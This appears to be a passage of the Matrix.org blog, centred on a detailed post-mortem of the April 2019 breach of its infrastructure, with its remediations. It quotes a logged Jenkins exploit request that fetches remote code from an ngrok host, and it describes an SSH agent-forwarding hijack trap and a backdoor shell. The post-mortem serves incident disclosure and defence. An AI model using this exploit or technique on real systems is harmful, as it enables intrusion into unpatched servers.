It's been a few weeks since we heard from Slavi about matrix-docker-ansible-deploy, but he's been working away on it:

We haven't shared any matrix-docker-ansible-deploy updates lately, but we've had lots of community contributions.

Most of it has been bug fixes and various internal improvements, but we've also landed a few large features. Here's what's most interesting lately:

🔗Dept of Status of Matrix

jaywink, maintainer of https://the-federation.info, told us what we all know to be true: Matrix is great and is getting more popular:

Matrix (Synapse) jumps to second place in https://the-federation.info site, which lists servers of the federated social web. Help us map the true size of the Matrixverse by adding your server by going a https://the-federation.info/register/yourdomain.tld. Note, SRV and well-known lookups not yet working, so registration needs to happen with the Matrix server real domain (and port if any).

🔗That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS to people who would normally be reading this in their own RSS reader - I apologise, we'll get the full-article feed back up soon.

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General, SecurityMatthew Hodgson

🔗Table of contents

🔗Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

🔗History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

🔗The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

🔗The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

🔗The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • Wordpress has been replaced by static generated sites (e.g. Gatsby)
  • cgit has been replaced by gitlab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

🔗Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

🔗SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

🔗SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommends using more modern protocols than scp).
  • If you need to regularly copy stuff from server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

🔗SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.

🔗SSH keys should give minimal access

Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

🔗Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

🔗It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

🔗Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

🔗SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.

🔗Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

🔗Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

🔗Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

🔗Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response and coordinate prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to informing the ICO (Information Commissioner Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

🔗Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

🔗Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

🔗Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

🔗Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

🔗Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc).
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

🔗Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Welcome to the 2019 GSoC Participants!

07.05.2019 00:00 — GSOCAndrew Morgan

It’s that time of year again! Matrix.org is once again participating in the Google Summer of Code program. We have been allocated four student slots by Google this year, and narrowing the 18 proposals we received down to just four was a very difficult task.

In the end, we have decided on the following four students and their proposed projects:

Alexey Andreyev’s proposal involves adding end-to-end encryption to libQMatrixClient for future support in Qt/libQMatrixClient-based clients such as Quaternion and Spectral. They will be mentored by kitsune, lead developer of libQMatrixClient, and our own end-to-end encryption expert, uhoreg.

Kai Hiller’s proposal for more reliable third-party protocol bridges includes adding the ability to notify the user when a message fails to reach its final destination despite being accepted by the bridge. Half-Shot.

Eisha Chen-yen-su’s proposal for Matrix Visualisations aims to “develop a tool which will visualise the event Directed Acyclic Graph data structure which describes the conversation history in a room. It will be a real-time visualisation of the DAG of a given Matrix room, as seen from the perspective of one or more HomeServers (HSes).” They state that “this tool will be useful for debugging or administration of Matrix HSes by making people able to easily see how the federation process works”. They have already posted prototypes of their tool in #gsoc:matrix.org, and it’s all written in Rust! Which makes their mentor, erikj, very happy.

And finally, Cnly’s proposal for working towards completion of Dendrite’s Client-Server API. The proposal also touches on general improvements to the codebase and increasing test coverage. Cnly will be mentored by babolivier and anoa.

Congratulations to the selected students. We look forward to participating with you on completing your project over the course of the summer holidays.

If your proposal was not selected, do not give up hope! Being an active member of the Matrix community and having a deep understanding of the ecosystem and its projects is a big part of what we look for when choosing candidates. If you stick around, you have a strong chance of being chosen in a subsequent year.

We will not be sharing individual’s proposal documents, but students are free to share them as they please.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General, SecurityMatthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

🔗Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

🔗Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

🔗Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

